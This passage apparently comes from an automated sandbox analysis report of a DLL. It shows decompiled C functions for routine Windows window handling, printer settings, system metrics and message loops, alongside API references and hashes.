Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 96613ee81bfca9d2b2d3965b8f7897d59224bb0bf5153c9803d31448371a9e6e
Instruction ID: 0405df0374289b7f2be771739d96a193a925d81b46886719ce0111e6a67a79bc
Opcode Fuzzy Hash: 96613ee81bfca9d2b2d3965b8f7897d59224bb0bf5153c9803d31448371a9e6e
Instruction Fuzzy Hash: 31318875600606AFD720DF24C885C5ABBA4FF00354B61C529F99A9B561CBB0FD90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10005427, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E10005427(void* __ecx, void* __edx, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				char _v268;
				struct HWND__* _v272;
				signed int _v276;
				long _v280;
				struct HWND__* _v284;
				intOrPtr _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t36;
				signed int _t53;
				intOrPtr _t56;
				long _t59;
				struct HWND__* _t62;
				CHAR* _t63;
				void* _t64;
				void* _t66;
				void* _t70;
				void* _t71;
				long _t72;
				void* _t73;
				void* _t74;
				signed int _t76;
				void* _t77;
				signed int _t81;

				_t70 = __edx;
				_t79 = _t81;
				_t36 =  *0x10031c30; // 0x1f496801
				_v8 = _t36 ^ _t81;
				_t72 = _a4;
				_t76 = 0;
				_v288 = _a8;
				E1000533C(0);
				_t66 = _t71;
				_t62 = E10005375(0,  &_v272);
				_v284 = _t62;
				if(_t62 != _v272) {
					EnableWindow(_t62, 1);
				}
				_v280 = _v280 & _t76;
				GetWindowThreadProcessId(_t62,  &_v280);
				if(_t62 == 0 || _v280 != GetCurrentProcessId()) {
					L7:
					__eflags = _t72;
					if(__eflags != 0) {
						_t76 = _t72 + 0x78;
					}
					goto L9;
				} else {
					_t59 = SendMessageA(_t62, 0x376, 0, 0);
					if(_t59 == 0) {
						goto L7;
					} else {
						_t76 = _t59;
						L9:
						_v276 = _v276 & 0x00000000;
						if(_t76 != 0) {
							_v276 =  *_t76;
							_t56 = _a16;
							if(_t56 != 0) {
								 *_t76 = _t56 + 0x30000;
							}
						}
						if((_a12 & 0x000000f0) == 0) {
							_t53 = _a12 & 0x0000000f;
							if(_t53 <= 1) {
								_t23 =  &_a12;
								 *_t23 = _a12 | 0x00000030;
								__eflags =  *_t23;
							} else {
								if(_t53 + 0xfffffffd <= 1) {
									_a12 = _a12 | 0x00000020;
								}
							}
						}
						_v268 = 0;
						_t96 = _t72;
						if(_t72 == 0) {
							_t63 =  &_v268;
							_t72 = 0x104;
							__eflags = GetModuleFileNameA(0, _t63, 0x104) - 0x104;
							if(__eflags == 0) {
								_v9 = 0;
							}
						} else {
							_t63 =  *(_t72 + 0x50);
						}
						_push(_a12);
						_push(_t63);
						_push(_v288);
						_push(_v284);
						_t73 = E10005292(_t63, _t66, _t72, _t76, _t96);
						if(_t76 != 0) {
							 *_t76 = _v276;
						}
						if(_v272 != 0) {
							EnableWindow(_v272, 1);
						}
						E1000533C(1);
						_pop(_t74);
						_pop(_t77);
						_pop(_t64);
						return E100127FF(_t73, _t64, _v8 ^ _t79, _t70, _t74, _t77);
					}
				}
			}

0x10005427
0x1000542a
0x10005432
0x10005439
0x10005442
0x10005445
0x10005448
0x1000544e
0x10005453
0x10005461
0x10005463
0x1000546f
0x10005474
0x10005474
0x1000547a
0x10005488
0x10005490
0x100054b8
0x100054b8
0x100054ba
0x100054bc
0x100054bc
0x00000000
0x100054a0
0x100054aa
0x100054b2
0x00000000
0x100054b4
0x100054b4
0x100054bf
0x100054bf
0x100054c8
0x100054cc
0x100054d2
0x100054d7
0x100054de
0x100054de
0x100054d7
0x100054e4
0x100054e9
0x100054ef
0x100054ff
0x100054ff
0x100054ff
0x100054f1
0x100054f7
0x100054f9
0x100054f9
0x100054f7
0x100054ef
0x10005503
0x1000550a
0x1000550c
0x10005513
0x10005519
0x1000552a
0x1000552c
0x1000552e
0x1000552e
0x1000550e
0x1000550e
0x1000550e
0x10005532
0x10005535
0x10005536
0x1000553c
0x1000554a
0x1000554e
0x10005556
0x10005556
0x1000555f
0x10005569
0x10005569
0x10005571
0x1000557c
0x1000557d
0x10005580
0x10005587
0x10005587
0x100054b2

APIs

Part of subcall function 10005375: GetParent.USER32(?), ref: 100053C9
Part of subcall function 10005375: GetLastActivePopup.USER32(?), ref: 100053DA
Part of subcall function 10005375: IsWindowEnabled.USER32(?), ref: 100053EE
Part of subcall function 10005375: EnableWindow.USER32(?,00000000), ref: 10005401

EnableWindow.USER32(?,00000001), ref: 10005474
GetWindowThreadProcessId.USER32(?,?), ref: 10005488
GetCurrentProcessId.KERNEL32 ref: 10005492
SendMessageA.USER32 ref: 100054AA
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10005524
EnableWindow.USER32(00000000,00000001), ref: 10005569

Strings

0, xrefs: 100054FF

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: 8feb766eef1197544db766d0d1c57136014f354103026958485284d619067133
Instruction ID: 2638408363aca2cfa21b8c06c6e42cd8fe04fb2a1000c35ec43cc594c904313f
Opcode Fuzzy Hash: 8feb766eef1197544db766d0d1c57136014f354103026958485284d619067133
Instruction Fuzzy Hash: AB4181319006289BFB21CF24CC867DB77B9FF057D6F100594EA59A6294D7B1DE808F90

Uniqueness

Uniqueness Score: -1.00%

Function 1000DF2B, Relevance: 12.1, APIs: 8, Instructions: 66
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000DF2B(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E1000FBA3(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E1000FBA3( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x1000df30
0x1000df32
0x1000df34
0x1000df3c
0x1000df56
0x1000df5e
0x1000df68
0x1000df6f
0x1000df71
0x1000df76
0x1000df79
0x1000df79
0x1000df90
0x1000df97
0x1000dfaf
0x1000dfb4
0x1000dfb9
0x1000dfb9
0x1000dfbf
0x1000dfbf
0x1000df6f
0x1000dfc4
0x1000dfc8

APIs

GlobalLock.KERNEL32 ref: 1000DF4A
lstrcmpA.KERNEL32(?,?,?,?,?,?,?,1000A950,?), ref: 1000DF56
OpenPrinterA.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,1000A950,?), ref: 1000DF68
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,1000A950,?), ref: 1000DF88
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 1000DF90
GlobalLock.KERNEL32 ref: 1000DF9A
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,1000A950,?), ref: 1000DFA7
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,1000A950,?), ref: 1000DFBF

Part of subcall function 1000FBA3: GlobalFlags.KERNEL32(?), ref: 1000FBB2
Part of subcall function 1000FBA3: GlobalUnlock.KERNEL32(?,?,1000DFB9,?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,1000A950), ref: 1000FBC4
Part of subcall function 1000FBA3: GlobalFree.KERNEL32 ref: 1000FBCF

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 87b92eb03e2b54822bf1cc103d77aa47a01502114be95760dddc9673a0b6cc6c
Instruction ID: 00194ddb4430f5e629b0343d4e978549586f03d5019932c4adb8221170b115d4
Opcode Fuzzy Hash: 87b92eb03e2b54822bf1cc103d77aa47a01502114be95760dddc9673a0b6cc6c
Instruction Fuzzy Hash: EA114C75500508BFEB22ABA5CD49D7F7AEDFF85680B10452AFA06D5025D732E921DB20

Uniqueness

Uniqueness Score: -1.00%

Function 1000FDEB, Relevance: 12.0, APIs: 8, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FDEB(void* __ecx) {
				struct HDC__* _t15;
				void* _t17;

				_t17 = __ecx;
				 *((intOrPtr*)(_t17 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t17 + 0xc)) = GetSystemMetrics(0xc);
				 *0x100586e8 = GetSystemMetrics(2) + 1;
				 *0x100586ec = GetSystemMetrics(3) + 1;
				_t15 = GetDC(0);
				 *((intOrPtr*)(_t17 + 0x18)) = GetDeviceCaps(_t15, 0x58);
				 *((intOrPtr*)(_t17 + 0x1c)) = GetDeviceCaps(_t15, 0x5a);
				return ReleaseDC(0, _t15);
			}

0x1000fdf8
0x1000fdfe
0x1000fe05
0x1000fe0d
0x1000fe17
0x1000fe28
0x1000fe32
0x1000fe3a
0x1000fe46

APIs

GetSystemMetrics.USER32 ref: 1000FDFA
GetSystemMetrics.USER32 ref: 1000FE01
GetSystemMetrics.USER32 ref: 1000FE08
GetSystemMetrics.USER32 ref: 1000FE12
GetDC.USER32(00000000), ref: 1000FE1C
GetDeviceCaps.GDI32(00000000,00000058), ref: 1000FE2D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1000FE35
ReleaseDC.USER32 ref: 1000FE3D

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 1a03c7b162347da967f1171b148404fb8c190a777a3d5a5658d043a46f0b9320
Instruction ID: 182f4aabae592e401556e030cb211ae3bf1e8f4b89dccf26787656f3358a66d9
Opcode Fuzzy Hash: 1a03c7b162347da967f1171b148404fb8c190a777a3d5a5658d043a46f0b9320
Instruction Fuzzy Hash: 99F01DB1E40724AAF7109B728C8AB177F68FB44761F104516EA099B280DBB599528FD0

Uniqueness

Uniqueness Score: -1.00%

Function 10011346, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10011346(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				signed int _t54;
				void* _t65;
				char* _t69;
				short* _t70;
				signed int _t72;
				signed int* _t83;
				short* _t84;
				void* _t93;
				signed int* _t101;
				signed int _t102;
				void** _t103;
				intOrPtr _t105;
				signed int _t107;
				signed int _t109;
				void* _t110;

				_t104 = __esi;
				_t99 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10031c30; // 0x1f496801
				_v8 = _t54 ^ _t109;
				_t103 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E1001117A(_t83);
					_t105 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t105;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t65 = 0;
					} else {
						_t69 = _t105 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t69;
						if(_t69 < _t105) {
							goto L15;
						} else {
							_t70 = E100111C1(_t83);
							_t93 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t93 = _t105 + 2 + E100160DB(_t84 + _t105) * 2;
							}
							_t33 =  &(_v76[3]); // 0x3
							_t101 = _v84;
							_t36 = _t84 + 3; // 0x3
							_t72 = _t93 + _t36 & 0xfffffffc;
							_t107 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t102 =  *(_t101 + 8) & 0x0000ffff;
							} else {
								_t102 =  *(_t101 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t93 || _t102 <= 0) {
								L17:
								 *_t84 = _a8;
								_t99 =  &_v72;
								E1000FF66(_t103, _t107, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t103[1] = _t103[1] + _t107 - _v80;
								GlobalUnlock( *_t103);
								_t103[2] = _t103[2] & 0x00000000;
								_t65 = 1;
							} else {
								_t99 = _t103[1];
								_t97 = _t99 - _t72 + _v84;
								if(_t99 - _t72 + _v84 <= _t99) {
									E1000FF66(_t103, _t107, _t107, _t97, _t72, _t97);
									_t110 = _t110 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t104);
					_pop(_t82);
				} else {
					_t65 = 0;
				}
				return E100127FF(_t65, _t82, _v8 ^ _t109, _t99, _t103, _t104);
			}

0x10011346
0x10011346
0x10011346
0x1001134e
0x10011355
0x1001135c
0x10011362
0x10011365
0x1001136e
0x1001136f
0x10011378
0x10011389
0x1001138c
0x10011394
0x100113aa
0x100113ac
0x100113af
0x100113b7
0x100113b1
0x100113b1
0x100113b1
0x100113c6
0x10011444
0x10011444
0x100113c8
0x100113dd
0x100113e2
0x100113e5
0x00000000
0x100113e7
0x100113e8
0x100113ee
0x100113f0
0x100113f5
0x10011401
0x10011401
0x10011408
0x1001140c
0x1001140f
0x10011413
0x10011416
0x1001141d
0x10011420
0x10011428
0x10011422
0x10011422
0x10011422
0x1001142f
0x10011454
0x1001145b
0x10011464
0x1001146c
0x10011479
0x1001147c
0x10011482
0x10011488
0x10011436
0x10011436
0x1001143d
0x10011442
0x1001144c
0x10011451
0x00000000
0x00000000
0x00000000
0x00000000
0x10011442
0x1001142f
0x100113e5
0x10011489
0x1001148a
0x10011367
0x10011367
0x10011367
0x10011497

APIs

GlobalLock.KERNEL32 ref: 10011372
lstrlenA.KERNEL32(?), ref: 100113BD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100113D7
_wcslen.LIBCMT ref: 100113FB

Strings

System, xrefs: 1001136E

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
String ID: System
API String ID: 4253822919-3470857405
Opcode ID: 68c545c748be74f27e8f88bf7f806848f4923a75265228c1b95738714d9e217a
Instruction ID: b61b05cbc2c10f1ad666bd9cba576616659c687b94bca4f8d368aa925c1e6f73
Opcode Fuzzy Hash: 68c545c748be74f27e8f88bf7f806848f4923a75265228c1b95738714d9e217a
Instruction Fuzzy Hash: AD418171900215DFDB18CFA4C885AEEBBB5FF04750F248229E815DF685E774E986CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100090FB, Relevance: 10.6, APIs: 7, Instructions: 117
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E100090FB(intOrPtr* __ecx, signed int _a4) {
				int _v8;
				int _v12;
				int _v16;
				struct tagMSG* _v20;
				struct HWND__* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t48;
				struct tagMSG* _t49;
				signed int _t51;
				void* _t54;
				void* _t56;
				int _t59;
				long _t62;
				signed int _t66;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t70 = __ecx;
				_t74 = __ecx;
				_v16 = 1;
				_v12 = 0;
				if((_a4 & 0x00000004) == 0) {
					L2:
					_v8 = 0;
					L3:
					_t48 = GetParent( *(_t74 + 0x20));
					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) | 0x00000018;
					_v24 = _t48;
					_t49 = E1000ED29(_t76);
					_t69 = UpdateWindow;
					_v20 = _t49;
					while(1) {
						_t77 = _v16;
						if(_v16 == 0) {
							goto L15;
						}
						while(1) {
							L15:
							_t51 = E1000F175(_t70, 0, _t74, _t77);
							if(_t51 == 0) {
								break;
							}
							if(_v8 != 0) {
								_t59 = _v20->message;
								if(_t59 == 0x118 || _t59 == 0x104) {
									E1000C40B(_t74, 1);
									UpdateWindow( *(_t74 + 0x20));
									_v8 = 0;
								}
							}
							_t71 = _t74;
							_t54 =  *((intOrPtr*)( *_t74 + 0x88))();
							_t82 = _t54;
							if(_t54 == 0) {
								_t45 = _t74 + 0x3c;
								 *_t45 =  *(_t74 + 0x3c) & 0xffffffe7;
								__eflags =  *_t45;
								return  *((intOrPtr*)(_t74 + 0x44));
							} else {
								_push(_v20);
								_t56 = E1000F078(_t69, _t71, 0, _t74, _t82);
								_pop(_t70);
								if(_t56 != 0) {
									_v16 = 1;
									_v12 = 0;
								}
								if(PeekMessageA(_v20, 0, 0, 0, 0) == 0) {
									while(1) {
										_t77 = _v16;
										if(_v16 == 0) {
											goto L15;
										}
										goto L4;
									}
								}
								continue;
							}
						}
						_push(0);
						E1000DE20();
						return _t51 | 0xffffffff;
						L4:
						__eflags = PeekMessageA(_v20, 0, 0, 0, 0);
						if(__eflags != 0) {
							goto L15;
						} else {
							__eflags = _v8;
							if(_v8 != 0) {
								_t70 = _t74;
								E1000C40B(_t74, 1);
								UpdateWindow( *(_t74 + 0x20));
								_v8 = 0;
							}
							__eflags = _a4 & 0x00000001;
							if((_a4 & 0x00000001) == 0) {
								__eflags = _v24;
								if(_v24 != 0) {
									__eflags = _v12;
									if(_v12 == 0) {
										SendMessageA(_v24, 0x121, 0,  *(_t74 + 0x20));
									}
								}
							}
							__eflags = _a4 & 0x00000002;
							if(__eflags != 0) {
								L13:
								_v16 = 0;
								continue;
							} else {
								_t62 = SendMessageA( *(_t74 + 0x20), 0x36a, 0, _v12);
								_v12 = _v12 + 1;
								__eflags = _t62;
								if(__eflags != 0) {
									continue;
								}
								goto L13;
							}
						}
					}
				}
				_t66 = E1000C324(__ecx);
				_v8 = 1;
				_t76 = _t66 & 0x10000000;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}

0x100090fb
0x1000910f
0x10009111
0x10009114
0x10009117
0x10009128
0x10009128
0x1000912b
0x1000912e
0x10009134
0x10009138
0x1000913b
0x10009140
0x10009146
0x100091b6
0x100091b6
0x100091b9
0x00000000
0x00000000
0x100091bb
0x100091bb
0x100091bb
0x100091c2
0x00000000
0x00000000
0x100091c7
0x100091cc
0x100091d4
0x100091e1
0x100091e9
0x100091eb
0x100091eb
0x100091d4
0x100091f0
0x100091f2
0x100091f8
0x100091fa
0x10009231
0x10009231
0x10009231
0x00000000
0x100091fc
0x100091fc
0x100091ff
0x10009204
0x10009207
0x10009209
0x10009210
0x10009210
0x10009222
0x100091b6
0x100091b6
0x100091b9
0x00000000
0x00000000
0x00000000
0x100091b9
0x100091b6
0x00000000
0x10009222
0x100091fa
0x10009226
0x10009227
0x00000000
0x1000914b
0x10009158
0x1000915a
0x00000000
0x1000915c
0x1000915c
0x1000915f
0x10009163
0x10009165
0x1000916d
0x1000916f
0x1000916f
0x10009172
0x10009176
0x10009178
0x1000917b
0x1000917d
0x10009180
0x1000918e
0x1000918e
0x10009180
0x1000917b
0x10009194
0x10009198
0x100091b3
0x100091b3
0x00000000
0x1000919a
0x100091a6
0x100091ac
0x100091af
0x100091b1
0x00000000
0x00000000
0x00000000
0x100091b1
0x10009198
0x1000915a
0x100091b6
0x10009119
0x1000911e
0x10009121
0x10009126
0x00000000
0x00000000
0x00000000

APIs

GetParent.USER32(?), ref: 1000912E
PeekMessageA.USER32 ref: 10009152
UpdateWindow.USER32(?), ref: 1000916D
SendMessageA.USER32 ref: 1000918E
SendMessageA.USER32 ref: 100091A6
UpdateWindow.USER32(?), ref: 100091E9
PeekMessageA.USER32 ref: 1000921A

Part of subcall function 1000C324: GetWindowLongA.USER32 ref: 1000C32F

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 9f16ee9e1cfa848d00a0b147fe6f292eba32f10ebbd0d2dbe8e9adced7fcedc8
Instruction ID: a0f6b3c0031b256a321cac2c30ea11f9816ce22995143b05f367ef36aed9c1be
Opcode Fuzzy Hash: 9f16ee9e1cfa848d00a0b147fe6f292eba32f10ebbd0d2dbe8e9adced7fcedc8
Instruction Fuzzy Hash: 08417F30A0064AABEB21DF65CC88EDEBFF5FF817D0F20805DE945A21A9D7319A41DB10

Uniqueness

Uniqueness Score: -1.00%

Function 10009681, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10009681(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1000ED20();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E10006E1F(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E10013A90(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x2c;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				_t61 = _t34;
				E10009498(_t72, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf8))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E100095C7(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x11c))();
			}

0x1000968c
0x10009693
0x10009699
0x1000969e
0x100096c3
0x100096c3
0x100096c9
0x100096cb
0x100096cb
0x100096c9
0x100096ce
0x100096d3
0x100096d7
0x100096da
0x100096da
0x100096dd
0x100096e5
0x100096ea
0x100096ea
0x100096ed
0x100096f1
0x100096f4
0x100096fb
0x10009700
0x10009702
0x10009706
0x10009710
0x10009715
0x1000971b
0x1000971e
0x1000972f
0x10009736
0x10009739
0x10009739
0x10009706
0x10009700
0x1000974b
0x1000974f
0x10009751
0x10009760
0x1000976c
0x10009770
0x10009778
0x10009778
0x10009770
0x10009780
0x10009793

APIs

_memset.LIBCMT ref: 10009710
SendMessageA.USER32 ref: 10009739
GetWindowLongA.USER32 ref: 1000974B
GetWindowLongA.USER32 ref: 1000975C
SetWindowLongA.USER32(?,000000FC,?), ref: 10009778

Strings

,, xrefs: 1000972F

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: f32daad422f119cbffbc7c62140ac61fabe70516543f29c40d0ce1d9e8f934ea
Instruction ID: 1da44037123c774f6d076396f1a2bd261791088f2f9ffcbbcc8f5c49314eab9e
Opcode Fuzzy Hash: f32daad422f119cbffbc7c62140ac61fabe70516543f29c40d0ce1d9e8f934ea
Instruction Fuzzy Hash: 4631B0756007119FE711EFB9C884A6EBBF9FF48290F11052DF5869BAA5DB31E800CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10001AEB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10001AEB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t40;
				void* _t48;
				long _t51;
